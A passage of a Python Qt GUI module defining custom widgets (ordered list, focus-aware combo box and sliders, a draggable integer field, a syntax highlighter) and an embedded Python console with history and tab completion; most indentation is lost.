selection = self._itemList.selectionModel().selection().indexes()[0]
except IndexError:
selection = -1
self.item_edit.emit(selection, self.getItems())
def setUserSelection(self, index):
if self.item_count > 0: self._itemList.setCurrentIndex(self.item_list_model.item(index).index())
def createMenus(self):
# http://standards.freedesktop.org/icon-naming-spec/icon-naming-spec-latest.html
up = createAction('Up', self, [functools.partial(self.move, -1)], 'Move item up', icon=QtGui.QIcon.fromTheme("go-up"))
down = createAction('Down', self, [functools.partial(self.move, 1)], 'Move item down', icon=QtGui.QIcon.fromTheme("go-down"))
remove = createAction('Remove', self, [functools.partial(self.removeItem)], 'Remove item', icon=QtGui.QIcon.fromTheme("edit-delete"))
self.toolBar.addAction(up)
self.toolBar.addAction(down)
self.toolBar.addAction(remove)
def removeItem(self):
sm = self._itemList.selectionModel()
try:
selected_item = sm.selection().indexes()[0]
except IndexError: # nothing selected at all
return
selected_index = selected_item.data(QtCore.Qt.UserRole + 1)
removed_row = self.item_list_model.takeRow(selected_index)
self.item_count = self.item_count - 1
for i in xrange(selected_index, self.item_count):
self.item_list_model.item(i).setData(i, QtCore.Qt.UserRole + 1)
# re-sort and notify
self.item_list_model.sort(0)
try:
selection = self._itemList.selectionModel().selection().indexes()[0]
except IndexError:
selection = -1
self.item_edit.emit(selection, self.getItems())
def addItem(self, mitem, ignore=False):
item = QtGui.QStandardItem()
item.setData(mitem, QtCore.Qt.DisplayRole)
# Can be used to store data linked to the name
# item.setData(customData, QtCore.Qt.UserRole)
item.setData(self.item_count, QtCore.Qt.UserRole + 1)
self.item_list_model.appendRow(item)
self.item_count = self.item_count + 1
if not ignore:
try:
selection = self._itemList.selectionModel().selection().indexes()[0]
except IndexError:
selection = -1
self.item_edit.emit(selection, self.getItems())
def getItems(self):
return [self.item_list_model.item(i).data(QtCore.Qt.DisplayRole) for i in xrange(0, self.item_count)]
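# A minimal usage sketch for QOrderedListWidget, assuming a QApplication already exists
# when it is called; the stage names and the no-op slot are placeholders.
def _example_ordered_list_usage():
    ordered = QOrderedListWidget(items=['skeleton', 'solver', 'export'])
    ordered.item_edit.connect(lambda index, items: None)   # selected row plus current ordering
    ordered.setUserSelection(0)
    ordered.move(1)                                        # push the selected item one slot down
    return ordered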
class Qselect(QtGui.QComboBox):
'''Qselect is like a QComboBox, but has correct mouse wheel behaviour (only responds to wheel when it has focus).'''
def __init__(self, parent=None, options=None, default=None, cb=None):
QtGui.QComboBox.__init__(self, parent)
self.setFocusPolicy(QtCore.Qt.StrongFocus)
if options != None:
for item in options: self.addItem(item)
if default != None:
self.setCurrentIndex(options.index(default))
self.cb = cb
self.connect(self, QtCore.SIGNAL('currentIndexChanged(int)'), self.callback)
def callback(self, val):
if self.cb != None: self.cb(self, val)
def wheelEvent(self, e):
if self.hasFocus():
QtGui.QComboBox.wheelEvent(self, e)
else:
e.ignore()
def focusInEvent(self, e):
e.accept()
self.setFocusPolicy(QtCore.Qt.WheelFocus)
QtGui.QComboBox.focusInEvent(self, e)
def focusOutEvent(self, e):
e.accept()
self.setFocusPolicy(QtCore.Qt.StrongFocus)
QtGui.QComboBox.focusOutEvent(self, e)
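# A minimal usage sketch for Qselect showing the cb(widget, index) callback signature it
# invokes; the option strings and the callback body are placeholders.
def _example_qselect_usage():
    def on_pick(widget, index):
        print (widget.itemText(index))   # itemText comes from the QComboBox base class
    return Qselect(options=['linear', 'cubic'], default='cubic', cb=on_pick)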
class Qslide(QtGui.QSlider):
'''Qslide is like a QSlider, but has correct mouse wheel behaviour (only responds to wheel when it has focus).'''
def __init__(self, orient, parent=None):
QtGui.QSlider.__init__(self, orient, parent)
self.setFocusPolicy(QtCore.Qt.StrongFocus)
def wheelEvent(self, e):
if self.hasFocus():
QtGui.QSlider.wheelEvent(self, e)
else:
e.ignore()
def focusInEvent(self, e):
e.accept()
self.setFocusPolicy(QtCore.Qt.WheelFocus)
QtGui.QSlider.focusInEvent(self, e)
def focusOutEvent(self, e):
e.accept()
self.setFocusPolicy(QtCore.Qt.StrongFocus)
QtGui.QSlider.focusOutEvent(self, e)
class QslideLimitControl(QtGui.QGroupBox):
''' A control that contains a slider and a textbox useful for easy embedding in an app '''
# TODO handle scrollwheel and keyboard behaviour better, currently it scrolls by the slider units
# which can be very small
value_changed = QtCore.Signal(float)
def __init__(self, loval=0, hival=100, parent=None):
QtGui.QGroupBox.__init__(self, parent)
self.parent = parent
self.limits = [loval, hival]
self.digits = 2
self.valueIsAdjusting = False
self.createWidgets(loval, hival)
self.createLayout()
self.setStyleSheet("border:0;")
def createWidgets(self, loval, hival):
self.slider = Qslide(QtCore.Qt.Horizontal, self.parent)
self.value = loval
self.slider.unit = 1e-4
self.slider.setRange(min(max(-1e9, round(self.value / self.slider.unit)), 1e9), min(max(-1e9, round(hival / self.slider.unit)), 1e9))
self.slider.setValue(round(loval / self.slider.unit))
self.slider.valueChanged[int].connect(self.sliderSet)
self.display = QtGui.QLineEdit()
# self.display.setFont(QtGui.QFont('size=8em'))
self.display.setMaxLength(10)
unit = 1.0 # float(np.radians(1.0)) ### TODO
self.display.unit = unit
self.setDisplayText(self.value / unit)
self.display.editingFinished.connect(self.displaySet) # this folds the values of self and di into the callback
def createLayout(self):
layout = QtGui.QGridLayout()
layout.setColumnStretch(0, 5)
layout.setColumnStretch(1, 2)
layout.addWidget(self.slider)
layout.addWidget(self.display)
self.setLayout(layout)
def sync(self, value):
'''Update the gui to match the value; don't invoke the callback.'''
self.value = value
block = self.slider.blockSignals(True) # temporarily avoid callbacks
self.slider.setValue(round(value / self.slider.unit))
self.slider.blockSignals(block)
self.setDisplayText(self.slider.value() * self.slider.unit / self.display.unit)
# ought to update the lo/hi text boxes too?
def setValue(self, x, unit):
'''Set the value: clamp and run the callback. Don't update the gui.'''
self.value = x * unit
mn, mx = self.limits
self.value = max(mn, self.value)
self.value = min(mx, self.value)
self.value_changed.emit(self.value)
return self.value
def setLo(self, value):
self.limits[0] = value
self.slider.setMinimum(min(max(-1e9, round(value / self.slider.unit)), 1e9)) # actually, this might modify hi and value...
self.setDisplayText(self.slider.value() * self.slider.unit / self.display.unit)
self.limits[1] = self.slider.maximum() * self.slider.unit / self.display.unit
return value
def setHi(self, value):
self.limits[1] = value
self.slider.setMaximum(min(max(-1e9, round(value / self.slider.unit)), 1e9)) # actually, this might modify lo and value...
self.setDisplayText(self.slider.value() * self.slider.unit / self.display.unit)
self.limits[0] = self.slider.minimum() * self.slider.unit / self.display.unit
return value
def sliderSet(self, x):
if self.valueIsAdjusting: return
self.valueIsAdjusting = True
try:
self.setValue(self.slider.value(), self.slider.unit)
self.slider.setValue(round(self.value / self.slider.unit))
self.setDisplayText(self.value / self.display.unit)
except:
pass
self.valueIsAdjusting = False
def displaySet(self):
if self.valueIsAdjusting: return
self.valueIsAdjusting = True
try:
v = float(self.display.text())
self.setValue(v, self.display.unit)
self.slider.setValue(round(self.value / self.slider.unit))
self.setDisplayText(self.value / self.display.unit)
except:
self.setDisplayText(self.slider.value() * self.slider.unit / self.display.unit)
self.valueIsAdjusting = False
def setDisplayText(self, value):
self.display.setText(str(round(value, self.digits)))
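# A minimal usage sketch for QslideLimitControl, assuming a QApplication already exists
# when it is called; the limits and the synced value are placeholders.
def _example_slide_limit_usage():
    ctrl = QslideLimitControl(loval=0.0, hival=10.0)
    ctrl.value_changed.connect(lambda v: None)   # emitted with the clamped float value
    ctrl.setHi(5.0)                              # narrow the upper limit after construction
    ctrl.sync(2.5)                               # update the gui without firing value_changed
    return ctrl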
# POTENTIALLY DEPRECATED
class QslideLimitValue(QtGui.QGridLayout):
'''An object that wraps the layout and gui elements for a floating point value control with limits.'''
def __init__(self, name, value, loval, hival, cb, cbActor, parent=None):
QtGui.QGridLayout.__init__(self)
self.setColumnStretch(0, 1)
self.setColumnStretch(1, 5)
self.setColumnStretch(2, 2)
self.setColumnStretch(3, 1)
self.setColumnStretch(4, 1)
self.slider = Qslide(QtCore.Qt.Horizontal, parent)
self.value = value
self.slider.unit = 1e-4
self.slider.setRange(min(max(-1e9, round(loval / self.slider.unit)), 1e9), min(max(-1e9, round(hival / self.slider.unit)), 1e9))
self.slider.setValue(round(value / self.slider.unit))
self.slider.valueChanged[int].connect(self.sliderSet)
self.display = QtGui.QLineEdit()
# self.display.setFont(QtGui.QFont('size=8em'))
self.display.setMaxLength(10)
unit = 1.0 # float(np.radians(1.0)) ### TODO
self.display.unit = unit
self.display.setText(str(value / unit))
self.display.editingFinished.connect(self.displaySet) # this folds the values of self and di into the callback
self.limits = [loval, hival]
self.lo = QtGui.QLineEdit()
self.lo.setMaxLength(10)
self.lo.unit = unit
self.lo.setText(str(loval / unit))
self.lo.editingFinished.connect(self.loSet) # this folds the values of self and di into the callback
self.hi = QtGui.QLineEdit()
self.hi.setMaxLength(10)
self.hi.unit = unit
self.hi.setText(str(hival / unit))
self.hi.editingFinished.connect(self.hiSet) # this folds the values of self and di into the callback
self.name = name
self.label = QtGui.QLabel('<font size=8em>%s</font>' % name)
self.addWidget(self.label)
self.addWidget(self.slider)
self.addWidget(self.display)
self.addWidget(self.lo)
self.addWidget(self.hi)
self.cb = cb
self.cbActor = cbActor
self.valueIsAdjusting = False
def sync(self, value):
'''Update the gui to match the value; don't invoke the callback.'''
self.value = value
block = self.slider.blockSignals(True) # temporarily avoid callbacks
self.slider.setValue(round(value / self.slider.unit))
self.slider.blockSignals(block)
self.display.setText(str(self.slider.value() * self.slider.unit / self.display.unit))
# ought to update the lo/hi text boxes too?
def setValue(self, x, unit):
'''Set the value: clamp and run the callback. Don't update the gui.'''
self.value = x * unit
mn, mx = self.limits
self.value = max(mn, self.value)
self.value = min(mx, self.value)
print ("setValue")
self.cb(self.cbActor, self.name, self.value)
return self.value
def setLo(self, x, unit):
# do validation
value = float(x) * unit
self.limits[0] = value
self.slider.setMinimum(min(max(-1e9, round(value / self.slider.unit)), 1e9)) # actually, this might modify hi and value...
self.display.setText(str(self.slider.value() * self.slider.unit / self.display.unit))
self.hi.setText(str(self.slider.maximum() * self.slider.unit / self.hi.unit))
self.limits[1] = self.slider.maximum() * self.slider.unit / self.hi.unit
return value
def setHi(self, x, unit):
# do validation
value = float(x) * unit
self.limits[1] = value
self.slider.setMaximum(min(max(-1e9, round(value / self.slider.unit)), 1e9)) # actually, this might modify lo and value...
self.display.setText(str(self.slider.value() * self.slider.unit / self.display.unit))
self.lo.setText(str(self.slider.minimum() * self.slider.unit / self.lo.unit))
self.limits[0] = self.slider.minimum() * self.slider.unit / self.lo.unit
return value
def sliderSet(self, x):
if self.valueIsAdjusting: return
self.valueIsAdjusting = True
try:
self.setValue(self.slider.value(), self.slider.unit)
self.slider.setValue(round(self.value / self.slider.unit))
self.display.setText(str(self.value / self.display.unit))
except:
pass
self.valueIsAdjusting = False
def displaySet(self):
if self.valueIsAdjusting: return
self.valueIsAdjusting = True
try:
v = float(self.display.text())
self.setValue(v, self.display.unit)
self.slider.setValue(round(self.value / self.slider.unit))
self.display.setText(str(self.value / self.display.unit))
except:
self.display.setText(str(self.slider.value() * self.slider.unit / self.display.unit))
self.valueIsAdjusting = False
def loSet(self):
if self.valueIsAdjusting: return
self.valueIsAdjusting = True
try:
v = float(self.lo.text())
value = self.setLo(v, self.lo.unit)
self.lo.setText(str(value / self.lo.unit))
except:
self.lo.setText(str(self.limits[0] / self.lo.unit))
self.valueIsAdjusting = False
def hiSet(self):
if self.valueIsAdjusting: return
self.valueIsAdjusting = True
try:
v = float(self.hi.text())
value = self.setHi(self.hi.text(), self.hi.unit)
self.hi.setText(str(value / self.hi.unit))
except:
self.hi.setText(str(self.limits[1] / self.hi.unit))
self.valueIsAdjusting = False
class QintWidget(QtGui.QLineEdit):
    ''' Draggable spin box: ctrl + left, middle or right mouse button scrubs the value in the
    spinbox by increasingly large steps.
    '''
valueChanged = QtCore.Signal(list)
def __init__(self, parent=None):
super(QintWidget, self).__init__(parent)
# self.setDecimals(4)
# self.setButtonSymbols(QtGui.QAbstractSpinBox.NoButtons)
# self.setKeyboardTracking(False) # don't emit 3 times when typing 100
self.minstep = 1
self._dragging = False
self.current_value = None
self.setContextMenuPolicy(QtCore.Qt.PreventContextMenu) # no copy/paste menu to interfere with dragging
# catch the mouse events from the lineedit that is a child of the spinbox
# editor = self.findChild(QtGui.QLineEdit)
self.installEventFilter(self)
self.editingFinished.connect(functools.partial(self.handleEditingFinished))
# Add a Validator
int_validator = intValidator(self)
self.setValidator(int_validator)
self.setRange()
def handleEditingFinished(self):
self.setValue(self.text())
def setValue(self, v):
v = int(v) # ensure it's an int!
if self.current_value == v: return
self.current_value = v
self.setText(str(v))
# if not self._dragging:
self.valueChanged.emit(v)
# Constrains the spin box to between two values
def setRange(self, min=None, max=None):
try:
self.validator().setRange(min,max)
# print "Valid from {} to {}".format(str(self.validator().bottom()), str(self.validator().top()))
except:
print ("Inputs to QintWidget.setRange() are invalid with values {} and {}".format(min, max))
# Allows the box to be locked or unlocked
# Defaults to true so foo.setLocked() would lock "foo"
def setLocked(self, status=True):
assert isinstance(status, bool), "Lock value is not a boolean"
self.setReadOnly(status)
def value(self):
return int(self.text())
def text(self):
ret = super(QintWidget, self).text()
return ret
def eventFilter(self, obj, event):
if event.type() == QtGui.QMouseEvent.MouseButtonPress:
if not event.modifiers() & QtCore.Qt.ControlModifier:
return False
self.gpx, self.gpy = event.globalX(), event.globalY()
self.startX, self.startY = event.x(), event.y()
if event.button() & QtCore.Qt.LeftButton:
self._dragging = self.minstep
if event.button() & QtCore.Qt.MiddleButton:
self._dragging = self.minstep * 100
if event.button() & QtCore.Qt.RightButton:
self._dragging = self.minstep * 10000
return True
elif event.type() == QtGui.QMouseEvent.MouseButtonRelease:
if self._dragging is not False:
self._dragging = False
self.setValue(self.text())
else:
self._dragging = False
return True
elif event.type() == QtGui.QMouseEvent.MouseMove:
if self._dragging:
if not self.isReadOnly():
newValue = (self.value() + (event.x() - self.startX) * self._dragging)
if self.validator().bottom() is not None or self.validator().top() is not None:
newValue = np.clip(newValue, self.validator().bottom(), self.validator().top())
self.setValue(newValue)
QtGui.QCursor.setPos(self.gpx, self.gpy)
return True
return False
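# A minimal usage sketch for the scrubbable QintWidget, assuming a QApplication already
# exists when it is called; the range and initial value are placeholders.
def _example_qint_widget_usage():
    w = QintWidget()
    w.setRange(0, 255)                       # bounds typed values and ctrl+drag scrubbing
    w.setValue(128)
    w.valueChanged.connect(lambda v: None)   # emitted whenever the integer actually changes
    return w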
class QLineWidget(QtGui.QLineEdit):
valueChanged = QtCore.Signal(list)
def __init__(self, parent=None):
super(QLineWidget, self).__init__(parent)
self._dragging = False
self.current_value = None
self.setContextMenuPolicy(QtCore.Qt.PreventContextMenu)
self.installEventFilter(self)
self.editingFinished.connect(functools.partial(self.handleEditingFinished))
def handleEditingFinished(self):
self.setValue(self.text())
def setValue(self, v):
v = str(v)
if self.current_value == v: return
self.current_value = v
self.setText(v)
self.valueChanged.emit(v)
def setLocked(self, status=True):
assert isinstance(status, bool), "Lock value is not a boolean"
self.setReadOnly(status)
def value(self):
return self.text()
def text(self):
ret = super(QLineWidget, self).text()
return ret
class QTextWidget(QtGui.QTextEdit):
valueChanged = QtCore.Signal(list)
def __init__(self, parent=None):
super(QTextWidget, self).__init__(parent)
self.setTabChangesFocus(True)
self.current_value = None
self.setFont(QtGui.QFont('Courier New', 8, QtGui.QFont.Normal, 0))
self.resultHighlighter = PythonHighlighter(self)
def focusOutEvent(self, event):
super(QTextWidget, self).focusOutEvent(event)
self.setValue(self.toPlainText())
def setValue(self, v):
v = str(v)
if self.current_value == v: return
self.current_value = v
self.setText(v)
self.valueChanged.emit(v)
def value(self):
        # Mirror QLineWidget.value(): hand back the widget's current plain text.
        return self.toPlainText()
class QCommandEntryWidget(QtGui.QTextEdit):
def __init__(self, *args):
QtGui.QTextEdit.__init__(self, *args)
self.setAcceptRichText(False)
def keyPressEvent(self, keyEvent):
if (
(keyEvent.key() == QtCore.Qt.Key_Enter) or
(keyEvent.key() == QtCore.Qt.Key_Return and
keyEvent.modifiers() & QtCore.Qt.ControlModifier)):
self.emit(QtCore.SIGNAL('enterPressed()'))
elif keyEvent.key() == QtCore.Qt.Key_Tab:
keyEvent.accept()
self.emit(QtCore.SIGNAL('tabPressed()'))
else:
QtGui.QTextEdit.keyPressEvent(self, keyEvent)
class HighlightingRule:
def __init__(self, pattern, format):
self.pattern = pattern
self.format = format
class PythonHighlighter(QtGui.QSyntaxHighlighter):
"""
Python Highlighter code borrowed from
http://wiki.python.org/moin/PyQt/Python syntax highlighting
"""
def __init__(self, document):
QtGui.QSyntaxHighlighter.__init__(self, document)
self.document = document
self.highlightingRules = []
STYLES = {
'keyword': self.format('blue'),
'operator': self.format('black'),
'brace': self.format('brown'),
'defclass': self.format('darkBlue', 'bold'),
'string': self.format('magenta'),
'string2': self.format('darkMagenta'),
'comment': self.format('darkGreen', 'italic'),
'self': self.format('black', 'italic'),
'numbers': self.format('purple'),
}
# Python keywords
keywords = [
'and', 'assert', 'break', 'class', 'continue', 'def',
'del', 'elif', 'else', 'except', 'exec', 'finally',
'for', 'from', 'global', 'if', 'import', 'in',
'is', 'lambda', 'not', 'or', 'pass', 'print',
'raise', 'return', 'try', 'while', 'yield',
'None', 'True', 'False',
]
# Python operators
operators = [
'=',
# Comparison
'==', '!=', '<', '<=', '>', '>=',
# Arithmetic
'\+', '-', '\*', '/', '//', '\%', '\*\*',
# In-place
'\+=', '-=', '\*=', '/=', '\%=',
# Bitwise
'\^', '\|', '\&', '\~', '>>', '<<',
]
# Python braces
braces = [
'\{', '\}', '\(', '\)', '\[', '\]',
]
self.tri_single = (QtCore.QRegExp("'''"), 1, STYLES['string2'])
self.tri_double = (QtCore.QRegExp('"""'), 2, STYLES['string2'])
rules = []
# Keyword, operator, and brace rules
rules += [(r'\b%s\b' % w, 0, STYLES['keyword'])
for w in keywords]
rules += [(r'%s' % o, 0, STYLES['operator'])
for o in operators]
rules += [(r'%s' % b, 0, STYLES['brace'])
for b in braces]
# All other rules
rules += [
# 'self'
(r'\bself\b', 0, STYLES['self']),
# Double-quoted string, possibly containing escape sequences
(r'"[^"\\]*(\\.[^"\\]*)*"', 0, STYLES['string']),
# Single-quoted string, possibly containing escape sequences
(r"'[^'\\]*(\\.[^'\\]*)*'", 0, STYLES['string']),
# 'def' followed by an identifier
(r'\bdef\b\s*(\w+)', 1, STYLES['defclass']),
# 'class' followed by an identifier
(r'\bclass\b\s*(\w+)', 1, STYLES['defclass']),
# From '#' until a newline
(r'#[^\n]*', 0, STYLES['comment']),
# Numeric literals
(r'\b[+-]?[0-9]+[lL]?\b', 0, STYLES['numbers']),
(r'\b[+-]?0[xX][0-9A-Fa-f]+[lL]?\b', 0, STYLES['numbers']),
(r'\b[+-]?[0-9]+(?:\.[0-9]+)?(?:[eE][+-]?[0-9]+)?\b', 0, STYLES['numbers']),
]
# Build a QRegExp for each pattern
self.rules = [(QtCore.QRegExp(pat), index, fmt) for (pat, index, fmt) in rules]
def format(self, color, style=''):
_color = QtGui.QColor()
_color.setNamedColor(color)
_format = QtGui.QTextCharFormat()
_format.setForeground(_color)
if 'bold' in style:
_format.setFontWeight(QtGui.QFont.Bold)
if 'italic' in style:
_format.setFontItalic(True)
return _format
def highlightBlock(self, text):
# Do other syntax formatting
for expression, nth, format in self.rules:
index = expression.indexIn(text, 0)
while index >= 0:
# We actually want the index of the nth match
index = expression.pos(nth)
length = len(str(expression.cap(nth)))
self.setFormat(index, length, format)
index = expression.indexIn(text, index + length)
self.setCurrentBlockState(0)
# Do multi-line strings
in_multiline = self.match_multiline(text, *self.tri_single)
if not in_multiline:
in_multiline = self.match_multiline(text, *self.tri_double)
def match_multiline(self, text, delimiter, in_state, style):
# If inside triple-single quotes, start at 0
if self.previousBlockState() == in_state:
start = 0
add = 0
# Otherwise, look for the delimiter on this line
else:
start = delimiter.indexIn(text)
# Move past this match
add = delimiter.matchedLength()
# As long as there's a delimiter match on this line...
while start >= 0:
# Look for the ending delimiter
end = delimiter.indexIn(text, start + add)
# Ending delimiter on this line?
if end >= add:
length = end - start + add + delimiter.matchedLength()
self.setCurrentBlockState(0)
# No; multi-line string
else:
self.setCurrentBlockState(in_state)
length = len(str(text)) - start + add
# Apply formatting
self.setFormat(start, length, style)
# Look for the next match
start = delimiter.indexIn(text, start + length)
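# A minimal usage sketch for PythonHighlighter, mirroring how QTextWidget attaches it to a
# QTextEdit above; the sample source text is a placeholder.
def _example_highlighter_usage():
    editor = QtGui.QTextEdit()
    highlighter = PythonHighlighter(editor)
    editor.setPlainText("def greet(name):\n    return 'hello %s' % name\n")
    return editor, highlighter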
class PythonConsole(QtGui.QFrame):
import re
findIdentifier = re.compile(r'([a-zA-Z0-9.]*)$')
def __init__(self, *args):
QtGui.QFrame.__init__(self, *args)
# Set layout and split the results field (top) and the command field (bottom)
self.layout = QtGui.QVBoxLayout(self)
self.splitter = QtGui.QSplitter(QtCore.Qt.Vertical, self)
self.splitter.setOpaqueResize(1)
self.layout.addWidget(self.splitter)
# Initialise environment
self.environment = {}
# Build result widget
self.resultWidget = QtGui.QTextEdit(self.splitter)
self.resultWidget.setReadOnly(True)
self.resultWidget.setFont(QtGui.QFont('Courier New', 8, QtGui.QFont.Normal, 0))
self.resultWidget.setMinimumHeight(50)
self.resultWidget.setTabStopWidth(20)
self.resultHighlighter = PythonHighlighter(self.resultWidget)
# Insert a welcome message to results
import sys
welcomeMsg = 'Welcome to Python Earthling\n' + sys.version + '\n\n'
self.resultWidget.setText(welcomeMsg)
# Build command widget
self.commandWidget = QCommandEntryWidget(self.splitter)
self.commandWidget.setFont(QtGui.QFont('Courier New', 8, QtGui.QFont.Normal, 0))
self.commandWidget.setMinimumHeight(28)
self.commandWidget.setTabStopWidth(20)
self.commandHighlighter = PythonHighlighter(self.commandWidget)
self.connect(self.commandWidget, QtCore.SIGNAL('enterPressed()'), self.enterCommand)
self.connect(self.commandWidget, QtCore.SIGNAL('tabPressed()'), self.tabCommand)
# Define text formats
self.normalTextFormat = QtGui.QTextCharFormat()
self.normalTextFormat.setFontWeight(QtGui.QFont.Normal)
self.resultTextFormat = QtGui.QTextCharFormat()
self.resultTextFormat.setForeground(QtGui.QColor(40, 40, 200))
self.resultTextFormat.setFontWeight(QtGui.QFont.Normal)
self.suggestionTextFormat = QtGui.QTextCharFormat()
self.suggestionTextFormat.setForeground(QtGui.QColor(20, 160, 20))
self.suggestionTextFormat.setFontWeight(QtGui.QFont.Normal)
self.errorTextFormat = QtGui.QTextCharFormat()
self.errorTextFormat.setForeground(QtGui.QColor(200, 40, 40))
self.errorTextFormat.setFontWeight(QtGui.QFont.Normal)
# Initialise history and set actions to scroll up and down through the history
self.history = []
self.historyPosition = 0
self.previousHistoryAction = QtGui.QAction('Previous History', self)
self.previousHistoryAction.setShortcut(QtGui.QKeySequence('Alt+Up'))
self.nextHistoryAction = QtGui.QAction('Previous History', self)
self.nextHistoryAction.setShortcut(QtGui.QKeySequence('Alt+Down'))
self.previousHistoryAction.triggered.connect(self.previousHistory)
self.nextHistoryAction.triggered.connect(self.nextHistory)
self.commandWidget.addAction(self.previousHistoryAction)
self.commandWidget.addAction(self.nextHistoryAction)
self.buildMenuBar()
# IO redirection
self.stdout = self._Stdout(self.resultWidget)
self.stderr = self._Stderr(self.resultWidget)
self.runCommand('from Ops import Runtime')
self.runCommand('runtime = Runtime.getInstance()')
self.runCommand('interface = runtime.interface')
self.clearHistory()
def buildMenuBar(self):
# Set actions and shortcuts
cutShortcut = QtGui.QKeySequence(QtGui.QKeySequence.Cut).toString()
copyShortcut = QtGui.QKeySequence(QtGui.QKeySequence.Copy).toString()
pasteShortcut = QtGui.QKeySequence(QtGui.QKeySequence.Paste).toString()
self.scriptSaveAction = QtGui.QAction('Save Script...', self)
self.scriptLoadAction = QtGui.QAction('Load Script...', self)
self.scriptSaveHistoryAction = QtGui.QAction('Save History...', self)
self.scriptFetchHistoryAction = QtGui.QAction('Fetch History', self)
self.scriptClearHistoryAction = QtGui.QAction('Clear History', self)
self.scriptSaveAction.triggered.connect(self.saveScript)
self.scriptLoadAction.triggered.connect(self.loadScript)
self.scriptSaveHistoryAction.triggered.connect(self.saveHistory)
self.scriptFetchHistoryAction.triggered.connect(self.fetchHistory)
self.scriptClearHistoryAction.triggered.connect(self.clearHistory)
self.editClearAction = QtGui.QAction('Clear', self)
self.editCutAction = QtGui.QAction('Cut\t%s' % cutShortcut, self)
self.editCopyAction = QtGui.QAction('Copy\t%s' % copyShortcut, self)
self.editPasteAction = QtGui.QAction('Paste\t%s' % pasteShortcut, self)
self.editClearAction.triggered.connect(self.clear)
self.editCutAction.triggered.connect(self.cut)
self.editCopyAction.triggered.connect(self.copy)
self.editPasteAction.triggered.connect(self.paste)
# Create menus
self.menuBar = QtGui.QMenuBar(self)
self.layout.setMenuBar(self.menuBar)
self.scriptMenu = QtGui.QMenu('Script')
self.menuBar.addMenu(self.scriptMenu)
self.scriptMenu.addAction(self.scriptSaveAction)
self.scriptMenu.addAction(self.scriptLoadAction)
self.scriptMenu.addSeparator()
self.scriptMenu.addAction(self.scriptSaveHistoryAction)
self.scriptMenu.addAction(self.scriptFetchHistoryAction)
self.scriptMenu.addAction(self.scriptClearHistoryAction)
self.editMenu = QtGui.QMenu('Edit')
self.menuBar.addMenu(self.editMenu)
self.editMenu.addAction(self.editClearAction)
self.editMenu.addAction(self.editCutAction)
self.editMenu.addAction(self.editCopyAction)
self.editMenu.addAction(self.editPasteAction)
def saveScript(self):
filename = QtGui.QFileDialog.getSaveFileName(self, 'Save Script', selectedFilter='*.py')
if filename and filename[0]:
filename = str(filename[0])
file(filename, 'wt').write(self.commandWidget.toPlainText())
def loadScript(self):
filename = QtGui.QFileDialog.getOpenFileName(self, 'Load Script', selectedFilter='*.py')
if filename and filename[0]:
filename = str(filename[0])
commands = file(filename, 'rt').read()
self.commandWidget.clear()
self.commandWidget.setText(commands)
self.commandWidget.moveCursor(QtGui.QTextCursor.End, QtGui.QTextCursor.MoveAnchor)
self.commandWidget.setFocus()
def historyToString(self):
return '\n'.join(self.history)
def saveHistory(self):
filename = QtGui.QFileDialog.getSaveFileName(self, 'Save History', selectedFilter='*.py')
if filename and filename[0]:
filename = str(filename[0])
file(filename, 'wt').write(self.historyToString())
def fetchHistory(self):
self.commandWidget.clear()
self.commandWidget.setText(self.historyToString())
self.commandWidget.moveCursor(QtGui.QTextCursor.End, QtGui.QTextCursor.MoveAnchor)
self.commandWidget.setFocus()
def clearHistory(self):
self.history = []
def clear(self):
self.resultWidget.clear()
def cut(self):
if (len(str(self.commandWidget.textCursor().selectedText()))):
self.commandWidget.cut()
else:
self.resultWidget.cut()
def copy(self):
if (len(str(self.commandWidget.textCursor().selectedText()))):
self.commandWidget.copy()
else:
self.resultWidget.copy()
def paste(self):
self.commandWidget.paste()
def previousHistory(self):
# Triggered using Alt+Up
        # Step one entry further back in the history (historyPosition grows) and show it
        # in the command field if anything is available
self.historyPosition = min(self.historyPosition + 1, len(self.history))
if not self.historyPosition:
self.commandWidget.clear()
else:
self.commandWidget.setText(self.history[-self.historyPosition])
self.commandWidget.moveCursor(QtGui.QTextCursor.End, QtGui.QTextCursor.MoveAnchor)
def nextHistory(self):
# Triggered using Alt+Down
        # Step one entry forward in the history (historyPosition shrinks) and show it
        # in the command field if anything is available
self.historyPosition = max(self.historyPosition - 1, 0)
if not self.historyPosition:
self.commandWidget.clear()
else:
self.commandWidget.setText(self.history[-self.historyPosition])
self.commandWidget.moveCursor(QtGui.QTextCursor.End, QtGui.QTextCursor.MoveAnchor)
def echoCommand(self, command, format=None):
# Print the command to the result field
# Set a default text format if it hasn't been supplied
if format is None: format = self.normalTextFormat
# Split the lines
lines = command.splitlines()
if lines and not lines[-1].strip():
del lines[-1]
self.resultWidget.moveCursor(QtGui.QTextCursor.End, QtGui.QTextCursor.MoveAnchor)
for line in lines:
textCursor = self.resultWidget.textCursor()
# textCursor.insertText(">> ", format)
textCursor.insertText("%s\n" % line, format)
def enterCommand(self):
# Execute the command as the user just pressed Ctrl-Enter or Ctrl-Return
# Get the position of the text cursor and get the command from the command field
cursor = self.commandWidget.textCursor()
command = str(self.commandWidget.toPlainText())
# Maya behaviour:
# If the user has selected a particular bit of command text we keep it, otherwise
# we clear the command field
if cursor.hasSelection():
start, end = cursor.selectionStart(), cursor.selectionEnd()
command = command[start:end]
else:
self.commandWidget.setText('')
self.commandWidget.textCursor().setPosition(0)
# Echo the command to the result field and execute the command
self.echoCommand(command, format=self.resultTextFormat)
self.runCommand(command)
def tabCommand(self):
# Print command completion if the user presses the tab key
# Create a completer
import rlcompleter, os
completer = rlcompleter.Completer(self.environment)
# Get the text we just wrote and look for the nearest identifier
index = self.commandWidget.textCursor().position()
if index == 0:
text = ''
else:
text = str(self.commandWidget.toPlainText())[:index]
match = self.findIdentifier.search(text)
if match: text = match.group(1)
# Remember the length of the text we wrote for later when we want to
# add to it
textOriginalLength = len(text)
# Try to find all the states (suggestions) available for the command text
# Collect the available options to a list and build a cache to avoid repetitions
options = []
cache = {}
try:
currentState = 0
while True:
result = completer.complete(text, currentState)
currentState += 1
if result is None: break
if cache.has_key(result): continue
cache[result] = True
options.append(result)
except TypeError as e:
print (str(e))
if len(options) == 0: return
# Check it's not the same as what we just wrote
if len(options) == 1 and options[0] != text:
self.commandWidget.insertPlainText(options[0][textOriginalLength:])
else:
commonPrefix = os.path.commonprefix(options)
if len(commonPrefix) > textOriginalLength:
self.commandWidget.insertPlainText(commonPrefix[textOriginalLength:])
self.resultWidget.textCursor().insertText(' '.join(options) + '\n', self.suggestionTextFormat)
self.resultWidget.moveCursor(QtGui.QTextCursor.End, QtGui.QTextCursor.MoveAnchor)
def runCommand(self, command):
